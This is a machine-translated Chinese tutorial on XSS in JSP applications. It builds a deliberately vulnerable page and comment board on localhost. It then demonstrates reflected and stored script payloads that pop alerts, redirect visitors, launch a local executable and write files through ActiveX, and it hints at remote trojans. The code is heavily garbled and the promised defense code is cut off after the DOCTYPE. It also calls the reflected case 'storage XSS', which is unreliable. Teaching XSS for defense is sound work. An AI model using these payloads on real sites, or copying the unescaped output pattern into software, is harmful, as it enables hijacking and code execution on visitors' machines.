JSP security Development of the XSS vulnerability detailed _java

Objective

Hello everybody, good man is me, I am a good man, I am -0nise. We often see XSS vulnerabilities in each of the major vulnerability reporting platforms. So the question is, why is there such a loophole? How should this vulnerability be fixed?

Body

1.XSS? Xss? What the hell is XSS?

XSS is also called a cross-site scripting attack (Cross Site scripting), and I won't tell him that it was originally called CSS, but not to confuse the cascading style sheet (cascading style Sheets) CSS we used. CSS (Cross-site scripting attacks), CSS (cascading style sheet) silly confused. So it's called XSS.

What is the harm of 2.XSS?

Experiment One:

0x00 Construction Code

<%@ page language= "java" import= "java.util.*" pageencoding= "UTF-8"%> <% String Path = Request.getcontextpath ()
;
String basepath = request.getscheme () + "://" +request.getservername () + ":" +request.getserverport () +path+ "/"; %> <! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" >  

0x01 Environment Layout

0x02 Vulnerability Walkthrough

Our visit: Http://localhost:8080/XSS/index.jsp?opr=i%E6%98%A5%E7%A7%8B

Then visit: http://localhost:8080/XSS/index.jsp?opr=0nise

In the end we found a "great law":

OPR parameters are equal to what the page is printed on. (It seems to be nonsense)

We'll then load a picture to see

Visit: Http://localhost:8080/XSS/index.jsp?opr=%3Cimg%20src=%221.png%22%3E%3C/img%3E

Since the picture can be loaded, then our JS file is also wide to load it?

Visit: Http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Ealert (/i%e6%98%a5%e7%a7%8b%e7%a4%be%e5%8c%ba%e6%ac%a2% e8%bf%8e%e5%a4%a7%e5%ae%b6/)%3c/script%3e

Js? Js? So is it possible to change the post-jump address?

Visit: Http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Elocation.href=%27http://bbs.ichunqiu.com%27%3C/script%3E

Since XSS can load JS, then, we are not through JS to open some of the local things?

Put a MD5.exe file in advance

Visit: http://localhost:8080/XSS/index.jsp?opr= < p="">

Since even local files can open so remote file Trojan? A computer prank? This self slowly quadrants. I didn't say that.

Files can be opened, then write some files?

Visit: Http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Evar%20fso,tf;fso%20=%20new%20ActiveXObject (% 22SCRIPTING.FILESYSTEMOBJECT%22); Tf%20=%20fso. CreateTextFile (%22d:\\test.txt%22,true), TF. WriteLine (%22i%e6%98%a5%e7%a7%8b%e7%a4%be%e5%8c%ba%e6%ac%a2%e8%bf%8e%e6%82%a8%22), TF. Close (); alert (%22%e6%96%87%e4%bb%b6%e5%86%99%e5%85%a5%e6%88%90%e5%8a%9f%ef%bc%81%22);%3c/script%3e

Through the above experiment we can see the OPR parameter assignment operation. If the OPR parameter has no value, execution cannot be performed, and the attacker must access an attacker who has designed it in advance to attack. This type of XSS attack is called: storage XSS

If you want to see more force-giving experiments, go ahead and look down.

Experiment Two:

Objective:

Most Web sites are dealing with data. So what are the XSS vulnerabilities that appear in these sites?

0x00 Construction Code

Database section

Basedao.java

Import java.sql.Connection;
Import Java.sql.DriverManager;
Import java.sql.PreparedStatement;
Import Java.sql.ResultSet;
Import java.sql.SQLException;
Import java.sql.Statement;
    public class Basedao {//Open connection Public Connection Getconn () {Connection conn = null;
      try {class.forname ("com.microsoft.sqlserver.jdbc.SQLServerDriver");
    conn = Drivermanager.getconnection ("jdbc:sqlserver://localhost:1433;databasename=sqltmp", "sa", "sa");
    catch (ClassNotFoundException e) {e.printstacktrace ();
    catch (SQLException e) {e.printstacktrace ();
  Return conn;
        ///close link method public void CloseAll (Connection conn,statement stat,resultset rs) {try {if (rs!= null)
      Rs.close ();
      if (stat!= null) stat.close ();
       
    IF (conn!= null) Conn.close ();
    catch (SQLException e) {e.printstacktrace (); }//overload shutdown method public void CloseAll (Connection conn,preparedstatement pstat,resultset rs){try {if (rs!= null) rs.close ();
      if (pstat!= null) pstat.close ();
       
    IF (conn!= null) Conn.close ();
    catch (SQLException e) {e.printstacktrace ();
        ()//Continue overloading public void CloseAll (Connection conn,preparedstatement pstat) {try {if (pstat!= null)
      Pstat.close ();
    IF (conn!= null) Conn.close ();
    catch (SQLException e) {e.printstacktrace ();
    Common method public int upDate (String sql,object[] pram) {PreparedStatement pstat = null;
    Connection conn = null;
     
    int a = 0;
      try {conn = Getconn ();
      PStat =conn.preparestatement (SQL);
      Iterates through the parameter collection, adding the parameters in the collection to the SQL statement for (int i = 1; I <= pram.length; i++) {Pstat.setobject (I, pram[i-1]);
       
    //Call Method A = Pstat.executeupdate ();
    catch (SQLException e) {e.printstacktrace ();
    }finally{CloseAll (conn, pstat);
  return A; }
}
  
 

Commentdao.java

Import java.sql.*;
Import java.util.*;
Import entity.*;
    public class Commentdao extends Basedao {/** * get all messages */public list<comm> getcomment () {//sql statements
    String sql = "Select Cid,cname,ccontext from Comments";
    list<comm> list = new arraylist<comm> ();
    Database Connection object Connection conn = null;
    SQL Execution Object PreparedStatement pstmt = null;
    Database execution return value ResultSet rs = null;
      try {//CREATE DATABASE Link conn = This.getconn ();
      Create SQL Execution Object pstmt = conn.preparestatement (sql);
      Execute SQL statement return value RS = Pstmt.executequery ();
        Read while (Rs.next ()) {Comm Comment = new comm ();
        Comment.setcid (Rs.getint ("CID"));
        Comment.setcname (rs.getstring ("CName"));
        Comment.setccontext (rs.getstring ("Ccontext"));
      List.add (comment);
    } catch (Exception e) {e.printstacktrace ();
    }finally{//Close This.closeall (conn, pstmt, RS);
  } return list; } public int addcomment (comm comment) {String sql = INSERT into Comments VALUES (?,?);  
    Number of affected rows int result = 0;
    Database Connection object Connection conn = null;
    SQL Execution Object PreparedStatement pstmt = null;
      try {//CREATE DATABASE Link conn = This.getconn ();
      Create SQL Execution Object pstmt = conn.preparestatement (sql);
      Set parameter pstmt.setstring (1, Comment.getcname ());
      Pstmt.setstring (2, Comment.getccontext ());
    Execute SQL statement result = Pstmt.executeupdate ();
    catch (Exception e) {e.printstacktrace ();
    }finally{This.closeall (conn, pstmt);
  return result;

 }
}

Commentservlvet

Import java.io.*;
Import javax.servlet.*;
Import javax.servlet.http.*;
Import entity.*; public class Commentservlvet extends HttpServlet {/** * doget () */public void doget (HttpServletRequest request
    , httpservletresponse response) throws Servletexception, IOException {request.setcharacterencoding ("UTF-8");
    Response.setcontenttype ("Text/html;charset=utf-8");
    PrintWriter out = Response.getwriter ();
    String OPR = Request.getparameter ("OPR");
    Commentdao Commentdao = new Commentdao ();
      Retrieves whether the parameter is an empty if (OPR = null | | opr.equals ("all")) {Request.setattribute (' All ', commentdao.getcomment ());
    Forwarding Request.getrequestdispatcher ("comment.jsp"). Forward (request, response);
      }else if (opr.equals ("add")) {Comm Comment = new comm ();
      Comment.setcname (Request.getparameter ("UName"));
      Comment.setccontext (Request.getparameter ("context")); if (commentdao.addcomment (comment) > 0) {out.print ("<script>alert" ('Message successful '); location.href= ' Commentservlvet?opr=all ';</script> ');
      }else{Out.print ("<script>alert failure"); location.href= ' Commentservlvet?opr=all ';</script> ');
      }}else{Request.setattribute ("All", commentdao.getcomment ());
    Forwarding Request.getrequestdispatcher ("comment.jsp"). Forward (request, response);
    } out.flush ();
  Out.close (); }/** * DoPost () */public void DoPost (HttpServletRequest request, httpservletresponse response) throws
  Servletexception, IOException {doget (request, response);

 }
}

Comment.jsp

<%@ page language= "java" import= "java.util.*,entity.*" pageencoding= "UTF-8"%> <% String Path =
Request.getcontextpath ();
String basepath = request.getscheme () + "://" +request.getservername () + ":" +request.getserverport () +path+ "/"; %> <! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" >  

0x01 Vulnerability Experiment

root@1~#

We leave message on the message board:

<script> var objShell = new ActiveXObject("wscript.shell");objShell.Run("G:/work/XSS/WebRoot/Md5.exe");</script>

Then visit: http://localhost:8080/XSS/comment.jsp

So as long as you access this page, the software will automatically open, to a remote file? Slowly comprehend.

root@2~#


We leave message on the message board:

Copy Code code as follows:

<script>var Fso,tf;fso = new ActiveXObject ("Scripting.FileSystemObject"); tf = fso. CreateTextFile ("D:\\test.txt", true); TF. WriteLine ("I Spring Community welcomes You"); Close (); alert ("File write succeeded!") ");</script>

Then visit: http://localhost:8080/XSS/comment.jsp

File write succeeded.

root@3~#

Message content:

[code]<script>location.href= ' http://bbs.ichunqiu.com ' </script>[code]

Access page: http://localhost:8080/XSS/comment.jsp

Visit the Message page to automatically jump to an attacker-specific site. Is this the legendary hijacking?

3.XSS Defense Plan

Where there is an attack, there is a defense. Like XSS, there is a way of attacking, and there are defensive schemes.

El expression +jstl Tag Library

EL (Expression Language): [size=12.0000pt] to make the JSP easier to write. The expression language is inspired by the ECMAScript and XPath expression language, and he provides a way to simplify the expression in the JSP, making the JSP code simpler.

JSTL (JSP Standard Tag Library): Open source JSP Tag library.

Experiment One Defense code:

<%@ page language= "java" import= "java.util.*" pageencoding= "UTF-8"%> <%@ taglib "uri=" http://java.sun.com/jsp
/jstl/core "prefix=" C "%> <% String Path = Request.getcontextpath ();
String basepath = request.getscheme () + "://" +request.getservername () + ":" +request.getserverport () +path+ "/"; %> <! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" >  

Experiment Two defense codes:

<%@ page language= "java" import= "java.util.*,entity.*" pageencoding= "UTF-8"%> <%@ taglib
"uri=" http:// Java.sun.com/jsp/jstl/core "prefix=" C "%>
<%
String path = Request.getcontextpath ();
String basepath = request.getscheme () + "://" +request.getservername () + ":" +request.getserverport () +path+ "/";
%>

<! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" >  

Conclusion

Technology without black and white, specialized research very good.